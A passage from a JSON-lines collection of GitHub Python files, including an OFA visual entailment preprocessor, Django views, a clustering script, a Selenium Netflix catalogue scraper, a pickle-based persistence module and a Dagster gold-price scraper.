'_'\r\n\r\nprint(firstnonrepeating_simp(input(\"Enter string: \")))\r\n","repo_name":"aashishah/DSA_Practice","sub_path":"Strings/FirstNonRepeatingChar.py","file_name":"FirstNonRepeatingChar.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22864149968","text":"from typing import Any, Dict\n\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom modelscope.preprocessors.image import load_image\nfrom modelscope.utils.constant import ModeKeys\nfrom .base import OfaBasePreprocessor\n\n\nclass OfaVisualEntailmentPreprocessor(OfaBasePreprocessor):\n r\"\"\"\n OFA preprocessor for visual entailment tasks.\n \"\"\"\n\n def __init__(self,\n cfg,\n model_dir,\n mode=ModeKeys.INFERENCE,\n *args,\n **kwargs):\n \"\"\"preprocess the data\n\n Args:\n cfg(modelscope.utils.config.ConfigDict) : model config\n model_dir (str): model path,\n mode: preprocessor mode (model mode)\n \"\"\"\n super(OfaVisualEntailmentPreprocessor,\n self).__init__(cfg, model_dir, mode, *args, **kwargs)\n # Initialize transform\n self.patch_resize_transform = transforms.Compose([\n lambda image: image.convert('RGB'),\n transforms.Resize(\n (self.patch_image_size, self.patch_image_size),\n interpolation=transforms.InterpolationMode.BICUBIC),\n transforms.ToTensor(),\n transforms.Normalize(mean=self.mean, std=self.std),\n ])\n\n def __call__(self, data: Dict[str, Any]) -> Dict[str, Any]:\n if self.mode == ModeKeys.TRAIN:\n return self._build_train_sample(data)\n else:\n return self._build_infer_sample(data)\n\n def _build_train_sample(self, data: Dict[str, Any]) -> Dict[str, Any]:\n r\"\"\"\n Building training samples.\n\n step 1. Preprocess the data using the logic of `_build_infer_sample`\n and make sure the label data in the result.\n step 2. Preprocess the label data to generate the `target` and\n `prev_output_tokens`.\n - tokenize the label data.\n - calculate the target item.\n 1) if `promp_type` is `None`, using tokenized label data.\n 2) if `promp_type` is `src`, concatenating the `source` data\n and tokenized label data.\n 3) if `promp_type` is `prev_output`, concatenating the `source`\n data without eos token and tokenized label data\n step 3. Add constraint mask\n\n Args:\n data (`Dict[str, Any]`): Input data, should contains the key of `text`\n `text2` and `label` are optional.\n Return:\n A dict object, contains source text input, patch images, patch masks\n with `Tensor([True])` value, decoder prompt, label, target, previous\n output tokens and constraint mask.\n \"\"\"\n sample = self._build_infer_sample(data)\n target = ' {}'.format(sample['label'])\n sample['ref_dict'] = {sample['label']: 1.0}\n tgt_item = self.tokenize_text(target, add_bos=False, add_eos=False)\n\n if self.prompt_type == 'none':\n prev_output_item = torch.cat([self.bos_item, tgt_item])\n target_item = torch.cat([prev_output_item[1:], self.eos_item])\n elif self.prompt_type == 'src':\n prev_output_item = torch.cat([sample['source'], tgt_item])\n target_item = torch.cat([prev_output_item[1:], self.eos_item])\n elif self.prompt_type == 'prev_output':\n prev_output_item = torch.cat([sample['source'][:-1], tgt_item])\n target_item = torch.cat([prev_output_item[1:], self.eos_item])\n else:\n raise NotImplementedError\n\n target_item[:-len(tgt_item) - 1] = self.tokenizer.pad_token_id\n sample['target'] = target_item\n sample['prev_output_tokens'] = prev_output_item\n\n if self.constraint_trie is not None:\n constraint_mask = torch.zeros(\n (len(target_item), len(self.tgt_dict))).bool()\n start_idx = len(target_item) - len(tgt_item) - 1\n for i in range(\n len(target_item) - len(tgt_item) - 1, len(target_item)):\n constraint_prefix_token = [\n self.tgt_dict.bos()\n ] + target_item[start_idx:i].tolist()\n constraint_nodes = self.constraint_trie.get_next_layer(\n constraint_prefix_token)\n constraint_mask[i][constraint_nodes] = True\n sample['constraint_mask'] = constraint_mask\n\n return sample\n\n def _build_infer_sample(self, data: Dict[str, Any]) -> Dict[str, Any]:\n r\"\"\"\n Building inference samples.\n\n step 1. Preprocessing the image as model's image input.\n - get the pillow image input from `data`\n - do some transforms to the pillow image, such as resize, normalize etc.\n step 2. Building the instruction as model's source text input.\n - use text input to build instruction. so far, we support two kind of\n input form, we will take different examples to both of them to explain\n how to use them.\n 1) only `text` input in data. this setting can solve the tasks which\n judge whether or not the input `text` describe the input image.\n 2) both `text` and `text2` input in data. this setting can solve the\n tasks which judge whether or not the `text` together with input image\n can imply the `text2`\n - tokenize the instruction above.\n step 3. Calculate the decoder prompt input.\n step 4. Whether or not to add label data.\n\n Args:\n data (`Dict[str, Any]`): Input data, should contains the key of `text`\n `text2` and `label` are optional.\n Return:\n A dict object, contains source text input, patch images, patch masks\n with `Tensor([True])` value, decoder prompt and label.\n \"\"\"\n image = self.get_img_pil(data[self.column_map['image']])\n patch_image = self.patch_resize_transform(image)\n if 'text2' not in data:\n hypothesis = self.pre_caption(data[self.column_map['text']],\n self.max_src_length)\n prompt = self.cfg.model.get('prompt',\n ' does the image describe \" {} \"?')\n text = prompt.format(hypothesis)\n else:\n assert 'text' in data, f'text must be in the input {data.keys()}'\n caption = self.pre_caption(data[self.column_map['text2']],\n self.max_src_length)\n hypothesis = self.pre_caption(data[self.column_map['text']],\n self.max_src_length)\n prompt = self.cfg.model.get(\n 'prompt', ' can image and text1 \" {} \" imply text2 \" {} \"?')\n text = prompt.format(caption, hypothesis)\n inputs = self.tokenize_text(text)\n if self.prompt_type == 'none':\n prefix_token = []\n decoder_prompt = self.bos_item\n elif self.prompt_type == 'prev_output':\n prefix_token = inputs[:-1] # remove eos\n decoder_prompt = inputs[:-1]\n else:\n raise NotImplementedError\n sample = {\n 'source': inputs,\n 'patch_image': patch_image,\n 'patch_mask': torch.tensor([True]),\n 'prefix_token': prefix_token,\n 'decoder_prompt': decoder_prompt,\n }\n if 'relation' in self.column_map and self.column_map[\n 'relation'] in data:\n sample['label'] = data[self.column_map['relation']]\n return sample\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/preprocessors/ofa/visual_entailment.py","file_name":"visual_entailment.py","file_ext":"py","file_size_in_byte":7614,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"30471865583","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\nfrom about.models import Data\n\ndef index(request):\n return render(request, \"index.html\")\n\ndef photo(request):\n data = Data.objects.all()\n context = {\n \"datas\": data\n }\n print(data)\n return render(request, \"photo.html\", context=context)\n\ndef about(request):\n with open('about/about.txt') as file:\n file2 = file.readlines()\n context = {\n \"about\": file2\n }\n return render(request, \"about.html\", context=context)\n\ndef contacts(request):\n with open('about/contacts.txt') as file:\n file2 = file.readlines()\n context = {\n \"contacts\": file2\n }\n return render(request, \"contacts.html\", context=context)","repo_name":"Nurzhigit2109/Django_task1","sub_path":"task/about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26425500332","text":"import os\n\n# 현재 파이썬 스크립트의 위치를 가져옵니다.\nscript_dir = os.path.dirname(os.path.abspath(__file__))\n\n# 파일 경로를 지정합니다.\ninput_base_path = os.path.join(script_dir, r\"../src/dts_original/\")\noutput_base_path = os.path.join(script_dir, r\"../src/dts_processed/\")\n\ndef list_local_files(directory_path) :\n # 디렉토리 내의 파일들을 리스트로 반환합니다.\n return [os.path.join(directory_path, file_name) for file_name in os.listdir(directory_path)]\n\nlocal_original_files = list_local_files(input_base_path)\n\nfor dts_file in local_original_files:\n file_name = os.path.basename(dts_file)\n file_name_without_ext = os.path.splitext(file_name)[0]\n input_file_path = input_base_path + file_name\n output_file_path = output_base_path + file_name_without_ext + \"_output.txt\"\n\n # 입력 파일을 open, readlines로 읽어옵니다.\n with open(input_file_path, \"r\", encoding=\"utf-8\") as infile:\n lines = infile.readlines()\n # print(lines)\n\n # 출력 파일에 `{` 다음에 줄바꿈이 오는 줄들 ('{\\n'으로 끝나는 줄)만을 이어붙입니다.\n with open(output_file_path, \"w\", encoding=\"utf-8\") as outfile:\n for line in lines:\n if (line.strip().endswith(\"{\") | line.strip().endswith(\"}\")):\n # print(line)\n outfile.write(line)\n\n print(f\"[-] Work Done! Checkout {output_file_path} file.\")\n ","repo_name":"reteu5/starlink_bobdoduk","sub_path":"code/parse_from_dts_simplified.py","file_name":"parse_from_dts_simplified.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6233811481","text":"import numpy as np\n\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nfrom typing import List\n\nfrom scripts.data_processing.clustering_model import ClusteringModel\nfrom scripts.data_processing.model_repo import ModelRepo\nfrom spherecluster import SphericalKMeans\n\nfrom scripts.data_processing.model_folder import ModelFolder\nfrom scripts.data_processing.data_loading import save_clustering_model\n\n\ndef __run_clustering(vectors: np.ndarray, models_folder: Path, n_clusters: int, n_init: int, max_iter: int, init: str,\n n_jobs: int, random_state: int) -> SphericalKMeans:\n print(f'thread = {n_jobs}')\n kmeans = SphericalKMeans(n_clusters=n_clusters, n_init=n_init, max_iter=max_iter, n_jobs=n_jobs,\n verbose=1, random_state=random_state, init=init)\n kmeans.fit(vectors)\n save_clustering_model(models_folder / f'repo-kmeans-{n_clusters}', kmeans)\n\n\ndef run_clustering(\n model_folder: ModelFolder, clustering_model_name: str, data_folder: Path, ns_clusters: List[int], n_init: int,\n max_iter: int, init: str = 'random', n_jobs: int = -1, random_state: int = 42\n) -> List[SphericalKMeans]:\n\n clustering_model = ClusteringModel(model_folder.clustering_models_folder / clustering_model_name, model_folder)\n model_repo = ModelRepo(data_folder)\n vectors = model_repo.repos_cluster_embeddings(model_folder, clustering_model)\n models = []\n for n_clusters in ns_clusters:\n models.append(__run_clustering(\n vectors, model_folder.clustering_models_folder, n_clusters, n_init, max_iter, init, n_jobs, random_state\n ))\n return models\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--folder', help='Folder with model information', required=True, type=str)\n parser.add_argument('--clustering_model', help='Name of clustering model', required=True, type=str)\n parser.add_argument('--data_folder', help='Folder with dataset info', required=True, type=str)\n parser.add_argument('--n_clusters', help='Number of clusters', required=True, type=int, nargs='+')\n parser.add_argument('--n_init', help='Number of initializations to try', default=10, type=int)\n parser.add_argument('--max_iter', help='Maximum number of iterations', default=300, type=int)\n parser.add_argument('--init', help='Type of initialization (k-means++ or random)', default='random', type=str)\n parser.add_argument('--n_jobs', help='Number of processes to use when optimizing', default=-1, type=int)\n parser.add_argument('--random_state', help='Random state', default=42, type=int)\n args = parser.parse_args()\n\n run_clustering(ModelFolder(Path(args.folder), Path(args.data_folder)), args.clustering_model,\n Path(args.data_folder), args.n_clusters,\n args.n_init, args.max_iter, args.init, args.n_jobs, args.random_state)\n","repo_name":"egor-bogomolov/topic-modeling","sub_path":"scripts/clustering/run_repos_clustering.py","file_name":"run_repos_clustering.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12039974633","text":"import argparse\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nparser = argparse.ArgumentParser(description='Automatically commit file changes.')\nparser.add_argument(\"-p\", \"--path\", help=\"Enter folder path.\")\n#parser.add_argument(\"-u\")\nargs = parser.parse_args()\n\npath = args.path\n\n\nclass CommitHandler(FileSystemEventHandler):\n def process(self, event):\n print(event.event_type, event.src_path)\n\n def on_any_event(self, event):\n self.process(event)\n\n\nif __name__ == '__main__':\n observer = Observer()\n observer.schedule(CommitHandler(), path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"sharadbhat/Python-Scripts","sub_path":"Auto Commit/auto_commit.py","file_name":"auto_commit.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42248857648","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import CategoriesList, ProductViewSet, ReviewViewSet, WishViewSet\n\nproduct_router = DefaultRouter()\nproduct_router.register('', ProductViewSet)\n\nreview_router = DefaultRouter()\nreview_router.register('', ReviewViewSet)\n\nwish_router = DefaultRouter()\nwish_router.register('', WishViewSet)\n\nurlpatterns = [\n path('categories/', CategoriesList.as_view()),\n path('', include(product_router.urls)),\n path('<str:short_title>/reviews/', include(review_router.urls)),\n path('<str:username>/wishlist/', include(wish_router.urls))\n]","repo_name":"Ataix/MyShop","sub_path":"myshop/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36844155282","text":"import unittest\n\nfrom zope.interface.verify import verifyClass\nimport zope.interface\nfrom six import class_types\nfrom slapos import slap\n\ndef getOnlyImplementationAssertionMethod(klass, method_list):\n \"\"\"Returns method which verifies if a klass only implements its interfaces\"\"\"\n def testMethod(self):\n implemented_method_list = {x for x in dir(klass)\n if not x.startswith('_') and callable(getattr(klass, x))}\n implemented_method_list.difference_update(method_list)\n\n if implemented_method_list:\n raise AssertionError(\"Unexpected methods %s\" % implemented_method_list)\n return testMethod\n\ndef getImplementationAssertionMethod(klass, interface):\n \"\"\"Returns method which verifies if interface is properly implemented by klass\"\"\"\n def testMethod(self):\n verifyClass(interface, klass)\n return testMethod\n\ndef getDeclarationAssertionMethod(klass):\n \"\"\"Returns method which verifies if klass is declaring interface\"\"\"\n def testMethod(self):\n if len(list(zope.interface.implementedBy(klass))) == 0:\n self.fail('%s class does not respect its interface(s).' % klass.__name__)\n return testMethod\n\ndef generateTestMethodListOnClass(klass, module):\n \"\"\"Generate test method on klass\"\"\"\n for class_id in dir(module):\n implementing_class = getattr(module, class_id)\n if not isinstance(implementing_class, class_types):\n continue\n # add methods to assert that publicly available classes are defining\n # interfaces\n method_name = 'test_%s_declares_interface' % (class_id,)\n setattr(klass, method_name, getDeclarationAssertionMethod(\n implementing_class))\n\n implemented_method_list = ['with_traceback']\n for interface in list(zope.interface.implementedBy(implementing_class)):\n # for each interface which class declares add a method which verify\n # implementation\n method_name = 'test_%s_implements_%s' % (class_id,\n interface.__identifier__)\n setattr(klass, method_name, getImplementationAssertionMethod(\n implementing_class, interface))\n\n for interface_klass in interface.__iro__:\n implemented_method_list.extend(interface_klass.names())\n\n # for each interface which class declares, check that no other method are\n # available\n method_name = 'test_%s_only_implements' % class_id\n setattr(klass, method_name, getOnlyImplementationAssertionMethod(\n implementing_class,\n implemented_method_list))\n\nclass TestInterface(unittest.TestCase):\n \"\"\"Tests all publicly available classes of slap\n\n Classes are checked *if* they implement interface and if the implementation\n is correct.\n \"\"\"\n\n# add methods to test class\ngenerateTestMethodListOnClass(TestInterface, slap)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SlapOS/slapos.core","sub_path":"slapos/tests/test_interface.py","file_name":"test_interface.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"15312394701","text":"from urllib.request import urlopen as uReq\nfrom bs4 import BeautifulSoup as soup\nfrom selenium import webdriver\nimport time\nimport codecs\nimport csv\nimport json\nimport io\nimport os\nimport unicodedata\n\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n#Main function\n\ndef main():\n\n\tnetflixURL = []\n\tnetflixURLTV = []\n\tgenreList = []\n\tfileName = []\n\n\t#Open Chrome driver\n\toptions = webdriver.ChromeOptions()\n\toptions.add_argument('headless')\n\toptions.add_argument('window-size=2000x3000')\n\tdriver = webdriver.Chrome(chrome_options=options)\n\n\t# Opens list of URLs\n\topenURL(netflixURL, netflixURLTV, genreList, fileName)\n\n\turl = 'https://www.netflix.com/au/login'\n\tUSERNAME = ''\n\tPASSWORD = ''\n\t\n\tdriver.get(url)\n\t# wait up to 10 seconds for the elements to become available\n\tdriver.implicitly_wait(5)\n\t\n\t# use css selectors to grab the login inputs\n\temail = driver.find_element_by_css_selector('input[name=email]')\n\tpassword = driver.find_element_by_css_selector('input[name=password]')\n\tlogin = driver.find_element_by_css_selector('button[type=\"submit\"]')\n\n\temail.send_keys(USERNAME)\n\tpassword.send_keys(PASSWORD)\n\n\tlogin.click()\n\n\tdriver.get('https://www.netflix.com/SwitchProfile?tkn=A523JK2EC5ANTLAYQ7ALJN77TQ')\n\n\t# Parsing content for each genre\n\tnetflix(netflixURL, genreList, fileName, driver)\n\n\tnetflixTV(netflixURLTV, genreList, fileName, driver)\n\n\tdriver.quit()\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n#open list of URLs\n\ndef openURL(netflixURL, netflixURLTV, genreList, fileName):\n\n\twith open('movieList.csv') as movieList:\n\t\treader = csv.reader(movieList)\n\t\tfor row in reader:\n\t\t\tnetflixURL.append(row[0])\n\t\t\tnetflixURLTV.append(row[6])\n\t\t\tgenreList.append(row[4])\n\t\t\tfileName.append(row[5])\n\tprint('Loaded URLs')\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n# Netflix\n\ndef netflix(netflixURL, websiteGenre, fileName, driver):\n\n\t# local variables\n\tnetflix = 'https://netflix.com/au'\n\tmovieList = []\n\tlogo = '/images/logos/netflix.png'\n\n\tfor i in range(1, len(netflixURL)):\n\t\tprint(websiteGenre[i] + '------------------')\n\t\tdriver.get(netflixURL[i])\n\t\tdriver.implicitly_wait(5)\n\t\tscroll(driver)\n\t\t#driver.get_screenshot_as_file('./netflix/' + fileName[i] + '.png')\n\n\t\thtml = driver.page_source\n\t\tpage_soup = soup(html, \"html.parser\")\n\t\tcontainers = page_soup.findAll(\"div\", {\"class\":\"title-card-container\"})\n\n\t\tfor container in containers:\n\t\t\turl = container.div.div.a[\"href\"]\n\t\t\tfor x in range(1, len(url)):\n\t\t\t\tif url[x] == '/':\n\t\t\t\t\ty = [x, 0]\n\t\t\t\tif url[x] == '?':\n\t\t\t\t\ty[1] = x\n\t\t\tids = url[y[0]+1:y[1]]\n\t\t\tdata = {}\n\t\t\tdata['name'] = container.div.div.a[\"aria-label\"]\n\t\t\tdata['name'] = unicodedata.normalize('NFKD', data['name']).encode('ASCII', 'ignore').decode(\"ascii\")\n\t\t\tdata['name'] = data['name'].replace(' III', ' 3')\n\t\t\tdata['name'] = data['name'].replace(' II', ' 2')\n\t\t\tdata['name'] = data['name'].replace(' IV', ' 4')\n\t\t\tdata['id'] = int(ids)\n\t\t\tdata['type'] = 'movie'\n\t\t\tdata['url'] = netflix + url\n\t\t\tdata['genre'] = [{'title': websiteGenre[i]}]\n\t\t\tdata['poster_path'] = ''\n\t\t\tdata['banner_art'] = ''\n\t\t\tdata['stream'] = 'netflix'\n\t\t\tdata['logo'] = logo\n\t\t\tdata['classification'] = []\n\t\t\tdata['runtime'] = 0\n\t\t\tdata['release_date'] = ''\n\t\t\tdata['overview'] = ''\n\n\t\t\tmovieList.append(data)\n\n\t\tif os.path.isfile('./netflix/movies/' + fileName[i] + '.json'):\n\t\t\tos.remove('./netflix/movies/' + fileName[i] + '.json')\n\n\t\tfor j in range(0, len(movieList)):\n\t\t\twriteToJSONFile('./netflix/movies/' + fileName[i], movieList[j], 'a')\n\t\t\n\t\tmovieList = []\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n# Netflix TV\n\ndef netflixTV(netflixURLTV, websiteGenre, fileName, driver):\n\n\t# local variables\n\tnetflix = 'https://netflix.com/au'\n\ttvList = []\n\tlogo = '/images/logos/netflix.png'\n\n\tfor i in range(1, len(netflixURLTV)):\n\t\tif not netflixURLTV[i] == '':\n\t\t\tprint(websiteGenre[i] + '---------tv---------')\n\t\t\tdriver.get(netflixURLTV[i])\n\t\t\tdriver.implicitly_wait(5)\n\t\t\tscroll(driver)\n\t\t\t#driver.get_screenshot_as_file('./netflix/' + fileName[i] + '.png')\n\t\t\t\n\t\t\thtml = driver.page_source\n\t\t\tpage_soup = soup(html, \"html.parser\")\n\t\t\tcontainers = page_soup.findAll(\"div\", {\"class\":\"title-card-container\"})\n\t\t\t\n\t\t\tfor container in containers:\n\t\t\t\turl = container.div.div.a[\"href\"]\n\t\t\t\tfor x in range(1, len(url)):\n\t\t\t\t\tif url[x] == '/':\n\t\t\t\t\t\ty = [x, 0]\n\t\t\t\t\tif url[x] == '?':\n\t\t\t\t\t\ty[1] = x\n\t\t\t\tids = url[y[0]+1:y[1]]\n\t\t\t\tdata = {}\n\t\t\t\tdata['name'] = container.div.div.a[\"aria-label\"]\n\t\t\t\tdata['name'] = unicodedata.normalize('NFKD', data['name']).encode('ASCII', 'ignore').decode(\"ascii\")\n\t\t\t\tdata['name'] = data['name'].replace(' III', ' 3')\n\t\t\t\tdata['name'] = data['name'].replace(' II', ' 2')\n\t\t\t\tdata['name'] = data['name'].replace(' IV', ' 4')\n\t\t\t\tdata['type'] = 'tv'\n\t\t\t\tdata['id'] = int(ids)\n\t\t\t\tdata['url'] = netflix + url\n\t\t\t\tdata['genre'] = [{'title': websiteGenre[i]}]\n\t\t\t\tdata['poster_path'] = ''\n\t\t\t\tdata['banner_art'] = ''\n\t\t\t\tdata['stream'] = 'netflix'\n\t\t\t\tdata['logo'] = logo\n\t\t\t\tdata['classification'] = []\n\t\t\t\tdata['runtime'] = 0\n\t\t\t\tdata['release_date'] = ''\n\t\t\t\tdata['overview'] = ''\n\t\t\t\t\n\t\t\t\ttvList.append(data)\n\t\n\t\t\tif os.path.isfile('./netflix/tv/' + fileName[i] + '.json'):\n\t\t\t\tos.remove('./netflix/tv/' + fileName[i] + '.json')\n\t\n\t\t\tfor j in range(0, len(tvList)):\n\t\t\t\twriteToJSONFile('./netflix/tv/' + fileName[i], tvList[j], 'a')\n\t\t\t\n\t\t\ttvList = []\n\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n# Write data to json file\n\ndef writeToJSONFile(fileName, data, writeStatus):\n\n\tfilePathNameWExt = fileName + '.json'\n\twith io.open(filePathNameWExt, writeStatus, encoding=\"utf-8\") as f:\n\t\tjson.dump(data, f, ensure_ascii=False)\n\t\tf.write('\\n')\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n#Web Scroll function\n\ndef scroll(driver):\n\tSCROLL_PAUSE_TIME = 3\n\n\t# Get scroll height\n\tlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n\twhile True:\n\t\t# Scroll down to bottom\n\t\tdriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\n\t\t# Wait to load page\n\t\ttime.sleep(SCROLL_PAUSE_TIME)\n\t\t\n\t\t# Calculate new scroll height and compare with last scroll height\n\t\tnew_height = driver.execute_script(\"return document.body.scrollHeight\")\n\t\tif new_height == last_height:\n\t\t\tbreak\n\t\tlast_height = new_height\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n\nmain()","repo_name":"Grove3/DataMining","sub_path":"netflix.py","file_name":"netflix.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3243946322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\nfrom twidibot.logger import log\nfrom twidibot.helpers import gpDump, gpLoad, round_float_to_int\n\n\nclass StorageController(object):\n \"\"\"Generic controller that takes care of all strorage handlers.\"\"\"\n\n def __init__(self, handlers=list()):\n self.handlers = handlers\n\n def addHandler(self, handler):\n self.handlers.append(handler)\n\n def closeAll(self):\n \"\"\"To be called when all handlers need to be closed.\n\n Intended use case is overall program shutdown.\n \"\"\"\n\n for handler in self.handlers:\n if not handler.close():\n log.warning(\"StorageController::closeAll(): skipping over \"\n \"handler %s because it failed to close cleanly. Look up log lines \"\n \"before this one for possible indications why that happened.\",\n handler)\n\n\nclass StorageHandler(object):\n \"\"\"Base class. Children take care of specific ``StorageContainer``s.\n\n Handlers for \"ephemeral/volatile\" containers may not need take care of\n closing them down. This is needed for persistent storage handlers, though.\n\n Children should minimally implement\n * attachContainer()\n * detachContainer()\n * close()\n \"\"\"\n\n def __init__(self):\n self.containers = list()\n\n def attachContainer(self, container):\n \"\"\"Attach a new container (e.g. a single-pickle-file-container)\"\"\"\n\n self.containers.append(container)\n\n def detachContainer(self, container):\n \"\"\"Detach a particular container from handler\"\"\"\n\n matches = []\n for i, c in enumerate(self.containers):\n if c == container: # equivalence based on id()\n matches.append(i)\n for i in reversed(matches): # (in case of duplicates)\n self.containers.pop(i)\n # base ``StorageHandler`` doesn't care about the eventual fate\n # of its ``StorageContainer``s.\n\n def close(self):\n \"\"\"Close down this whole handler\"\"\"\n\n not_clean = False\n # create a shallow copy of the list of containers: since we may be popping\n # them from the list as we are processing it, we need to do this.\n for container in list(self.containers):\n ret = self.detachContainer(container)\n if not ret:\n not_clean = True\n return not not_clean\n\n\nclass PersistableStorageHandler(StorageHandler):\n \"\"\"Saves ``PersistableStorageContainer``s.\"\"\"\n\n APPEND_CLASS_NAME = False\n APPEND_SUFFIX = True\n DEFAULT_SUFFIX = \"state.gz\"\n\n def __init__(self, storage_suffix=None):\n super(PersistableStorageHandler, self).__init__()\n\n if not storage_suffix and self.APPEND_SUFFIX:\n storage_suffix = self.DEFAULT_SUFFIX\n self.storage_suffix = storage_suffix\n\n def formatFilenameFor(self, container, name):\n filename = name + \"%s%s\" % (\n \".\" + container.__class__.__name__ if self.APPEND_CLASS_NAME else \"\",\n \".\" + self.storage_suffix if self.storage_suffix else \"\")\n return filename\n\n def loadContainer(self, container, name):\n \"\"\"Try loading container data from storage.\n\n PersistableStorageContainer::loadContainer() method uses simple gzip +\n pickle load.\n \"\"\"\n\n if not name:\n return False\n filename = self.formatFilenameFor(container, name)\n if not os.path.isfile(filename):\n return False\n\n try:\n loaded = gpLoad(filename)\n container.__dict__.update(loaded.__dict__)\n except:\n return False\n return True\n\n def saveContainer(self, container, name):\n \"\"\"Try saving container data into persistent storage.\n\n PersistableStorageContainer::saveContainer() method uses simple gzip +\n pickle dump.\n \"\"\"\n\n if not name:\n return False\n filename = self.formatFilenameFor(container, name)\n\n try:\n gpDump(container, filename)\n except Exception as e:\n log.warning(\"Failed to persist container \\\"%s\\\". Error: %s\", name, e)\n return False\n return True\n\n def addContainer(self, name, try_to_load=True, **initial_attributes):\n container = PersistableStorageContainer(name)\n self.attachContainer(container, try_to_load=try_to_load, **initial_attributes)\n return container\n\n def attachContainer(self, container, try_to_load=True, **initial_attributes):\n super(PersistableStorageHandler, self).attachContainer(container)\n\n name = container._container_name # all PersistableStorageContainer\n # children will have this attribute\n\n if try_to_load and name: # can't load from storage without a name\n if not self.loadContainer(container, name):\n log.info(\"Couldn't load persistable container \\\"%s\\\" from storage - \"\n \"continuing.\", name)\n for k, v in initial_attributes.iteritems():\n setattr(container, k, v) # only initialize attrs if failed to load\n else:\n log.info(\"Loaded persistable container \\\"%s\\\" from storage\", name)\n\n def detachContainer(self, container, try_to_save=True):\n name = container._container_name\n log.debug(\"Detaching container \\\"%s\\\"...\", name if name else \"[no name]\")\n\n ret_val = True\n if try_to_save and name:\n if not self.saveContainer(container, name):\n log.warning(\"Couldn't save persistable container \\\"%s\\\" to storage. \"\n \"This is unexpected.\", name)\n ret_val = False\n else:\n log.info(\"Saved persistable container \\\"%s\\\"\", name)\n\n super(PersistableStorageHandler, self).detachContainer(container)\n\n return ret_val # if we weren't supposed to attempt a save, return True, too\n\n def close(self):\n return super(PersistableStorageHandler, self).close()\n\n\nclass StorageContainer(object):\n \"\"\"Base class for things that store some bot data/state.\"\"\"\n pass\n\n\nclass PersistableStorageContainer(StorageContainer):\n \"\"\"Generic serializable/persistable-container class.\"\"\"\n\n def __init__(self, name=None):\n super(PersistableStorageContainer, self).__init__()\n\n self._container_name = name\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"wfn/twidibot","sub_path":"twidibot/bot_storage.py","file_name":"bot_storage.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11755289430","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date\nimport pandas as pd\nfrom dagster import solid,OutputDefinition\nimport dagster_pandas as dp\n\ndaily_buying_price_df_for_gold = dp.create_dagster_pandas_dataframe_type(\n name=\"daily_buying_price_df_for_gold\",\n columns=[\n dp.PandasColumn.string_column(\"date\"),\n dp.PandasColumn.string_column(\"buying_price\")\n ],\n)\n\n@solid(output_defs=[OutputDefinition(name=\"daily_buying_price_df_for_gold\", dagster_type=daily_buying_price_df_for_gold)])\ndef download_contents_as_df(context,start_date : str , end_date : str) -> pd.DataFrame:\n date_price_list = []\n date_range_list_formatted = list(map(\n lambda x : {'date_for_url' : x.strftime('%Y/%m/%d'),'date_for_output' : x.strftime('%Y-%m-%d')}\n ,pd.date_range(start_date,end_date).to_pydatetime().tolist()\n ))\n for dt in date_range_list_formatted:\n headers = { \n 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0',\n 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'\n }\n link = 'https://altin.in/arsiv/{date}'.format(\n date=dt['date_for_url']\n )\n content = requests.get(link , headers = headers).text\n soup = BeautifulSoup(content,features='html.parser')\n price = soup.find_all('li',{'title': 'Gram Altın - Alış'})[0].text\n date_price_list.append({ 'date' : dt['date_for_output'] , 'buying_price' : price })\n return 